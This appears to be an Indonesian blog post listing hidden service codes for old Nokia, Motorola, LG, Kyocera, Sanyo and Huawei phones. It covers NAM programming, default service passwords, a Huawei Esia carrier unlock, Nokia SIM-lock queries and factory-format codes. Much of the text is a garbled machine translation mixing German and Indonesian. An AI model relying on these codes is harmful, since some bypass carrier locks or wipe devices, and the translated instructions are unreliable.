...Test Mode: 47*869#1235
Debug Menu: ##33284,ok
Service Menu: Menu+8+0 (#889)
Reset (Life time, Clear Memory, etc): ##786,ok
A-key: ##2539,ok
Label Selection: ##3882,ok
Label(Home, Work, etc) : **523,ok
NGG Setting (Gateway, etc.): ##2769737,ok
Vocoder: ##8626337,ok
CAI Change: ##7738,ok
Enable TTY: ##889,ok

¦ Nokia

NAM set : 3001#12345# atau #626#7764726#
Software Version : #837# atau #0000#
ESN : #92772689#
Phone Restart : #75681# atau #75682#
Vocoder : #3872#
Debug Screen/EVRC : #8378#
Debug : #8380#
Field Test Menu : #83788#
To activate Net Monitor menu
type *3001#12345#
scroll to Field Test
enable (it says something about switching your phone off)
exit menus
turn off
switch on
menu
Net Monitor
Enter display/group code

¦ Nokia Nokia 3280, 3285, 3580, 3585, 5185, 6185, 8280, etc Nam

Programming:
Nam Set: *3001#12345#
Software Version: *#837#
Software Version: *#9999#
Esn Number: *#92772689#
Restart Phone: *#75681#
Restart Phone: *#75682#
Nokia 8887 Nam Programming:
Nam Set: *3001#12345#
Version: *#0000#
Evrc: *#8378#
Esn/Data/Timer: *#92772689#
SID: *#743#

¦ Ericsson (sebelum joint-venture dengan Sony dan berubah menjadi SE)

Programming Shot NAM : 987 + menu
Programming long NAM : 923885 + menu and enter
SPC : “0000”
CDMA mode : 904093 + menu
Analog Mode : 904095 + menu
DM Mode : 904959 + menu

¦ Sony (sebelum joint-venture dengan Ericsson dan berubah menjadi SE)

CM-M1300/3300/Z200

Programming : type “111111” and press JOG DIAL
Choose Programming and
Enter SPC : “000000”

¦ LG

LGC-300

Programming : menu + 9 and enter SPC:”000000”
A-key : press STO for sometime enter zone
Type 2539** and enter A-key
LGC-510 Programming : menu + 3 + 0 and enter SPC: “000000”
LGC-800W/500 : menu + 0 and enter SPC: “000000”
LGC-330W Programming : menu + 4 + 0 and enter SPC: “000000”

gc-300, etc Nam Programming:
Nam Set: Menu, 9, Spc
A-key: Press “Sto” 3sec, 2539**
lgc-330w, etc Nam Programming:
Nam Set: Menu, 4, 0, Spc
A-key: 2539**

lgc-510, v111, etc Nam Programming:

Nam Set: Menu, 3, 0, Spc
A-key: 2539**
lgc-500, 800w, etc Nam Programming:
Nam Set: Menu, 9 , 0, Spc
Debug Mode: Menu, 7, 0, Fsc
Debug Mode: Menu, 8, 0, Fsc
A-key: 2539**
Lg LX,VX-series, […]

¦ Motorola

Motorola 7760, 7860, 2260, 8160, etc Nam Programming:

Nam Set: Fcn,0000000000000, Rcl
Nam Set: 74663#, Fcn, Fcn
Test Mode: Fcn, 00**83786633, Sto
Motorola v60c, v120c etc Nam Programming:
Nam Set: 74663#, Menu, Menu, Spc
Nam Set: Menu, 073887, * (type quickly)
Test Mode: Menu, 073887*, Spc
Debug Mode: ##33284
Force the phone into DIGITAL ONLY mode:
1) ##33284 (Debug)
2) RIGHT Softkey (Next) Twice
3) Down […]

Star TAC 7760/7860
Programming : FCN + 0 + 000000 + 000000 + RCL
Test Mode : FCN 00*83786633 STO
V 60c Programming
Service Menu : 74663#menu (Programming Code)
Test Mode : Menu 073887*
Security Code : 000000

¦ Kyocera

Qualcomm qcp-800 Nam Pogramming:
Nam Set: Menu+3+0+Spc
Field Test: Menu+7+0+Fsc
Kyocera 1135, 2255, 3035, 5135, 6035, Se47, etc Nam Programming:
Nam Set: 111111+Jog Dial(Ok), Select “Programming”+Spc
CAI Change: ##7738,ok
Enable TTY: ##889,ok
Life Timer, PRL, etc: ##786,ok
A-key: ##2539,ok
A-key: 2539,ok
Tips:
On some kyocera handsets the factory service module has not been disabled
and the phone can be programmed without the spc by inputting.
Nam Set: ##333333 […]

¦ Sanyo

Sanyo 4900, 5150, 5300, 8100, etc Nam Programming:
Nam Set: ##Spc+Ok+Key Down+Ok
Advanced Setup: ##3282+Ok+Key Down+Ok+Msl
A-key: ##2539+Ok+Key Down+Ok
Version: ##**837+Ok+Key Down+Ok
Debug Menu: ##FSC+Ok+Key Down+Ok
Airtime menu: ##8463+Ok+Key Down+Ok
Change CAI: ##7738+Ok+Key Down+Ok
Vocoder: ##8626337+Ok+Key Down+Ok
Reverse Logistic: ##786+Ok+Key Down+Ok
Set IP Address: ##2769737+Ok+Key Down+Ok
TTY On/Off: ##889+Ok+Key Down+Ok
Ready Link: ##4636+Ok+Key Down+Ok
Browser Init On/Off: ##4682+Ok+Key Down+Ok
Picture Token: ##25327+Ok+Key Down+Ok
Unknown Code: ##5282277+Ok+Key Down+Ok
(SPC=000000, FSC=040793)

kode Huawei c2601 Esia]

Test Mode: ##147852
Reset Pabrikan: ## 258147
Nam Programing: ##412365
Test Hp: ##745698
Unlock Biar Bisa Pake Kartu CDMA Apa Aj:
Pastikan Versi C tanggal 3 Agts 2007
Masukkan Kartu CDMA lain (selain Esia)
Keadaan Darurat Tekan ##412365
Tekan Ok samapai ketemu SID, Ubah menjadi 0000
Unlock done
tambahan lagi CODE2 AJA BUAT NOKIA
Siapa TAU ADA YG MAU LO Otak Atik HP Jadul YANG DAH GAK KEPAKE ATAU NOKIA Hp2 Masih Doyan BLACKBARY NON Jadul

sedikit sama sih kaya di atas

langsung coba


* # 06 #
16.12.03 Seriennummer / IMEI menunjukkan (sebenarnya juga GSM adalah kode - lihat di bawah)
...
=======-

* # 0000 #
16.12.03 pengumuman versi SW (misalnya V3.42.1, 16-10-03, NHL-10)

=======-

* # 2820 #
16.12.03 Bluetooth (BT) menunjukkan alamat perangkat.

======

xx #
16.12.03 Directory akses cepat (xx = tempat lokasi dan kemudian permen misalnya 24 #)

A / dari kunci
16.12.03 menekan pendek untuk menu untuk beralih antara profil

Tombol menu
16.12.03 Long menekan untuk "task manager" - switching antara program yang aktif (dengan program "C" kunci dapat dihentikan.)

Menu cepat akses
18.01.04 Selama dalam menu misalnya ke titik 3,1 sampai hanya 31 masukkan (jika simbol ketiga file dibuka adalah untuk ini dan kemudian di dalamnya mulai pertama Programm / Icon).

Autostart pergi berkeliling
28.12.03 Bila beralih pada dari Handys ke penyelidikan pin kunci "ABC" (pin) datang sepanjang waktu terus ditekan - ini adalah untuk mengabaikan (diduga) program autoinitialization.

#
15.02.04 Jangan beralih di antara baris yang berbeda (AS) ... pergi mis dengan Austria SATU Handys (lihat hidung licik). Aku tidak bisa mencoba akan tetapi juga, karena saya tidak memiliki 2 garis pada peta SIM.

12345
16.12.03 ... adalah sesuai dengan menetapkan standar nokia Nokia-Sicherheitscode.

0000
16.12.03 ... sesuai dengan standar tersebut (dengan bagian kaca bingkai Vodafone) menetapkan 2te pin dan kode bersih standar / password
Dengan D1 kode bersih standar adalah 4 angka terakhir dari nomor kartu tanpa HLR misalnya 99999234-5/55 -> 2345

0 - untuk waktu yang lama tekan
25.10.04 Jika salah satu "0" di menue utama untuk menekan waktu yang lama mereka homepage dari sambungan WAP standar disebut.

* # 7370925538 #
* # Dompet res #
28.12.03 ... harus dihapus kode di sekitar "dompet"! Input seperti nomor telepon biasa (bukan di jendela kode dompet penyelidikan).
CATATAN! Setelah itu "dompet" kosong, lagi-lagi dapat diletakkan pada namun dengan kode baru.

* # 7780 #
17.01.04 The "sikap asli" dan telepon kembali menetapkan lagi memulai (penyelidikan yang tepat dan mengikuti sebelum harus sicherheitscode yang dimasukkan).
CATATAN! Setelah itu berbagai "sikap" tidak berada - antara lain ini:
• Poin pintu masuk (Penyedia poin tergantung dari pintu masuk dan sikap)
• Bluetooth sikap
• Favorit
• Alokasi dua kunci (di samping tombol Navi) di menue utama
• Profil "diabaikan" (seperti dengan distribusi) - namun masih ada nada bel baru, dll ...
• SMS / / MMS E Mail sikap
• Logo dan spielstaende (diduga) juga akan dihapus ...
Program, kalender dan kontak, dll tidak berubah ...
Sicherheitscode juga tetap.
Ini kembali menempatkan pergi juga melalui menu bawah "sikap - umum -. Telepon asli sekali".

* # 7370 #
21.01.04 Soft format: Jika Handy (memori telepon saja) format, menempatkan kembali sikap (lihat * untuk # 7780 #) dan menerapkan RESET perangkat lunak. (Namun masih pertanyaan lain datang sebelumnya.)
CATATAN! Jika Akku menjadi 75% dimuat setidaknya, Akku tidak hanya mencapai selama prosedur dalam keadaan apa pun hapus! Prosedur ini memakan waktu beberapa menit (sekitar 3-4), benar-benar menunggu!
Ini adalah "hanya" dalam format soft ... Hard format dengan "hijau,, 3 *"... lihat di bawah.

Green, * 3
21.01.04 Hard format: Jika Handy (memori telepon saja) format, menempatkan kembali sikap (lihat * untuk # 7780 #) dan mengimplementasikan sebuah RESET.
CATATAN! Jika Akku menjadi 75% dimuat setidaknya, Akku tidak hanya mencapai selama prosedur dalam keadaan apa pun hapus! Prosedur ini memakan waktu beberapa menit (sekitar 3-4), benar-benar menunggu!

Prosiding: Peralatan menonaktifkan, yang menjaga "tombol hijau" (take off) pada waktu yang sama ditekan, "*" dan "3" kunci dan menghidupkan peralatan pada (tombol sehingga terus menekan lebih lanjut) ... untuk "Formatting" pada layar muncul ...
Jika itu tidak berfungsi, maka peralatan untuk 1 jam menonaktifkan, Akku sehingga untuk rausnehmen waktu yang lama dan coba lagi.
"Hanya" virtual memori umumnya dibersihkan - format asli dapat terjadi hanya di pusat layanan Nokia, jika Fash dihapus ada dan / atau LG baru diinstal.

Bercampur
16.12.03 * # 92702689 #, kemudian beralih - sistem menu off (berjalan dengan saya tidak)

Kode berikut tidak kali lipat (dengan saya juga):
* EFR0 # (* 3370 #) EFR aktifkan (EFR = Enhanced Full rate Coding - optimasi bahasa)
# EFR0 # (# 3370 #) EFR switch off
* HRC # (* 4720 #) HRC switch on (HRC = membantu Coding tingkat - kompresi bahasa)
# HRC0 # (# 4720 #) HRC switch off

SIM LOCK
12.01.04 Simlock status query: (gunakan "*" kunci over "p, w" dan "+" indikasi untuk masuk)
# Pw + 1234567890 +1 # Provider LOCK status
# Pw + 1234567890 +2 # network LOCK status
# Pw + 1234567890 +3 # Country LOCK status
# Pw + 1234567890 +4 # Sim Card LOCK status

Kode 1234567890 harus dihitung dengan program misalnya SmartDCT4Calc dan / atau DCT 4 code Calculator dari IMEI, dll ... Mencari informasi jika perlu di sini:

Info. untuk Simlock: SIM LOCK membuatnya untuk persembahan / operator jaringan mungkin, subsidi (verguenstigte) Handys tawarkan. Jadi satu yang membuat diri sendiri jika diancam diperlukan jika salah satu SIM LOCK dinonaktifkan - selain garansi bisa dibersihkan. Aku mengambil alih untuk itu tidak ada adhesi atau tanggung jawab!

GSM kode ... harus berfungsi pada setiap Handy - namun Netz (betreiber) abhaengig adalah ... dan "tidak berbahaya" ...
Umumnya berlaku: Pertama masukkan kode, "kirim" setelahnya ( tekan) dan satu saat tunggu ...
Good Link / Situs di samping:

SMS Tipps
27.01.04 Untuk Tipps & cheat tentang SMS (dengan kode yang sesuai) segera dalam daftar FAQ.
Misalnya untuk topik: SMS "menghambat" dan / atau pengakuan ditangguhkan mengirim, penerimaan, laporan ...

Markus lebih sederhana
01.03.04 Untuk Tipps & cheat untuk "tanda" topik misalnya dengan pintu masuk SMS.
Lebih dari cukup untuk menandai cukup dengan "pin" (ABC key) terus misalnya, beberapa SMS dan bergerak kemudian Jostick ke bawah.

=======

Memanggil nomor transmisi
01.01.04 * 31 # - {Restriction - Calling Restriction identifikasi LINE switch pada untuk transmisi panggilan ke nomor umum}
# 31 # - matikan transmisi panggilan ke nomor umum
# 31 # [nomor telepon] - dengan panggilan berikutnya menekan nomor panggilan sendiri (demikian sementara)
* 31 # [nomor telepon] - dengan panggilan Pengalihan Panggilan nomor berikutnya sendiri (demikian sementara)
* # 31 # - status query (transmisi nomor panggil)
# 31 * [nomor telepon] - menampilkan nomor panggilan sendiri, meskipun stasiun penerima diaktifkan menekan nomor panggilan. (Biasanya tidak de-energized dari Netz (betreiber).)

* 30 # - beralih {TIE-clip - Calling LINE presentasi identifikasi pengumuman pada jumlah panggilan pemanggil}
# 30 # - nonaktifkan
* # 30 # - status query

Ini juga sebagian berjalan dengan 6600 melalui Men: Sikap - panggilan - No sendiri kirim ...

Kode berikut ini tidak didukung oleh sebagian besar (betreibern) Netz:
* # 76 # - pengumuman nomor panggilan, di mana salah satu mencapai memanggil (tidak memanggil nomor selama rufumleitung!) {COLP - COonnected LINE presentasi identifikasi}
* 76 # - mengaktifkan
# 76 # - nonaktifkan

* # 77 # - pengumuman nomor panggilan, dimana pemanggil mencapai saya (tidak memanggil nomor saya selama meinerseits rufumleitung!) {COLR - Hubungkan LINE Pembatasan identifikasi}
* 77 # - mengaktifkan
# 76 # - nonaktifkan

Call mem-bypass (call Forwarding)
01.01.04 Bypass kode (U):
U = 21 selalu
U = 61 menghambat
U = 62 tidak dicapai
U 67 = menempati

U = 61, 62, 67 bisa paralel aktif

U = 21 -> dan kemudian tidak ada panggilan yang lebih signaling menimpa U = 61,62 dan 67! Layanan kode (D):
Tidak semua jaring mendukung semua layanan
D = 10 bahasa dan faks (semua panggilan)
D = 11 hanya bahasa
D = 12 semua data (kecepatan / menit)
D = faks hanya 13
D = 14 DATEX j (aktif?)
D = 15 teletex (aktif?)
D = 16 hanya SMS
D = 18 semua data kecuali SMS
D = 19 semua layanan kecuali SMS
D = 20 semua layanan
D = 21 semua layanan asynchronous
D = 22 semua sinkron layanan
D = 23 3.1 kHz GSM dari layanan bahasa
D = 24 semua ton TITIK sinkron dari inklusif DATA TITIK. PADS
D = 25 hanya data (semua asynchronous POINT ton dari inklusif DATA POINT. Bantalan)
D = 26 DATA pak pertukaran di sebelah kiri inklusif. PADS
D = 27 pelayanan melalui PADS
D = 29 12 Kbps digital kiri

** U * [tujuan panggilan ke nomor] * D # - bypass switch on
Input tanpa * D berarti memotong dari semua layanan

# # U ** D # - bypass switch off (bypasses individu dan kode layanan)
Tanpa ** D semua layanan dimatikan untuk bypasses
# # 002 # (semua bypasses untuk semua kode layanan menonaktifkan)
# # 004 # (hanya menonaktifkan U = 61, 62, 67 dan untuk semua kode layanan - dengan demikian ", tidak dapat dicapai, nonacceptance" menempati)

* # U ** D # - status query bypass:
Tanpa ** D input query semua layanan dan bypasses

Bypass dalam berbicara dan / atau kotak fax: Jumlah dalam prosedur bypass dengan D = 11 dan / atau 13 masukkan
Tujuan panggilan ke nomor (misalnya D2-Netz: 49172 xxx) dan Handynummer tanpa pemilihan pendahuluan (jika perlu menggantikan 172) masuk.

Tekan: Selama diaktifkan rufumleitung "dengan menduduki" bisa "untuk menolak" panggilan dengan satu tombol merah selama "untuk membunyikan" menekan. pemanggil tersebut kemudian diteruskan ke nomor panggilan tujuan dari pendudukan bypass (kotak misalnya).
Ketik untuk waktu tunggu selama rufumleitung 61: ** 61 * [tujuan panggilan ke nomor] * 11 * [waktu dalam detik. (5 sampai 30)] #

Ini juga sebagian berjalan dengan 6600 melalui menu: Sikap - rufumleitungen -...

Knock / berhenti / taman / kesalahan
01.01.04 mengetuk adalah isyarat panggilan sekunder selama diskusi saat ini
* 43 # - mengaktifkan
# 43 # - nonaktifkan
* # 43 # - status query

Ini juga sebagian berjalan dengan 6600 melalui menu: Sikap - panggilan - mengetuk ...

0 - menolak sementara diskusi ketukan
1 - diskusi mengakhiri, mengetuk diskusi menerima
diskusi tertentu (y) mengakhiri 1 (y)
2 - taman diskusi, mengetuk diskusi menerima
diskusi tertentu dan diskusi baru memimpin 2 taman (y)

0 - pemanggil sinyal kondisi sibuk

Ini juga sebagian berjalan dengan 6600 melalui menu yang ada selama diskusi.

Call penghalang
Kemungkinan hanya jika melewati dari kode layanan dimatikan 01.01.04.
Memeriksa kode (S):
S = 33 semua keluar transmisi
S = 331 outgoing luar negeri
S = 332 outgoing luar negeri kecuali rumah
S = 35 semua tiba transmisi
S = 351 semua tiba di luar negeri

kode cek Khusus (s) hapus:
Matikan hanya dalam kaitannya dengan prosedur
S = 330 memeriksa kode status transmisi keluar & tiba mematikan
S = 333 memeriksa kode status transmisi keluar menonaktifkan
S = 353 memeriksa kode status tiba transmisi menonaktifkan kode Service (D):
Tidak semua jaring mendukung semua layanan
D = 10 bahasa dan faks (semua panggilan)
D = 11 hanya bahasa
D = 12 semua data (kecepatan / menit)
D = faks hanya 13
D = 14 DATEX j (aktif?)
D = 15 teletex (aktif?)
D = 16 hanya SMS
D = 18 semua data kecuali SMS
D = 19 semua layanan kecuali SMS
D = 20 semua layanan
D = 21 semua layanan asynchronous
D = 22 semua sinkron layanan
D = 23 3.1 kHz GSM dari layanan bahasa
D = 24 semua ton TITIK sinkron dari inklusif DATA TITIK. PADS
D = 25 hanya data (semua asynchronous POINT ton dari inklusif DATA POINT. Bantalan)
D = 26 data paket bertukar link incl. PADS
D = 27 pelayanan melalui PADS
D = link 29 12 Kbps digital

* S * [Passwort] * D # - einschalten der Anruf-Sperre
# S * [Passwort] * D # - ausschalten der Anruf-Sperre
* # S # - Status der Anruf-Sperre abfragen

Passwort für Handy Sperre ndern?:
** 03 ** [Altes Passwort] * [Neues Passwort] * [Neues Passwort wiederholen] #
** 03 * 330 * [Altes Passwort] * [Neues Passwort] * [Neues Passwort wiederholen] #

Dies geht beim 6600 teilweise Auch melalui menu: Einstellungen - Anrufsperre ...

PIN? Ndern
01.01.04 ** 04 * [Alte PIN] [Neue PIN] * [Neue PIN wiederholen] * #
** 042 * [Alte PIN 2] * [Neue PIN 2] * [Neue PIN 2 wiederholen] #

Entsperren PIN: ** 05 * [PUK] * [Neue PIN] * [Neue PIN wiederholen] #
PIN 2 entsperren: ** 052 * [PUK2] * [Neue PIN 2] * [Neue PIN 2 wiederholen] #

Dies geht beim 6600 teilweise Auch melalui menu: Einstellungen - Sicherheit - Telefon und SIM ...

Beragam Kode
02.02.04 Die folgenden nur Kode klappen di einigen (wenigen) Netzen / Netzbetreibern ... leider z.B. nicht im Vodafone D2 Netz (di Deutschland):
* # 100 # - Eigene Nummer (Own Number)
* # 101 # - HLR Nummer
* # 102 # - Switch Nummer
* # 103 # - im Netz Zeit (Time Network)
* # 104 # - Anrufbeantworter Nummer (Nomor kotak pos suara)
* # 105 # - Switch nomor
* # 147 # - Letzter Anrufer (penelpon Terakhir)

# 646 # - Menit Digunakan: (646 spells 'MIN')
* # 1345 # atau * 174 # - Vodafone Prepaid balance

* 78 - Jangan ganggu - nur di Nord Amerika pada GSM CDMA und m Netzen glich?
* 79 - Batal (s.o.)

SEBENERNYA MASIH BANYAK LAGI YANG LAINNYA TAPI SUDAH KEPANJANGAN NANTI PUSING BACANYA, KAPAN-KAPAN SAJA YACH KAWAND,....,???

Sociable

advertiser

CBox :D

FANS PAGE

Change Language

DAFTAR ISI

SMS GRATIS

Langganan Artikel

Enter your email address:

Delivered by FeedBurner

Blog Archive

Categories

Search Engine OptimizationSubmit Express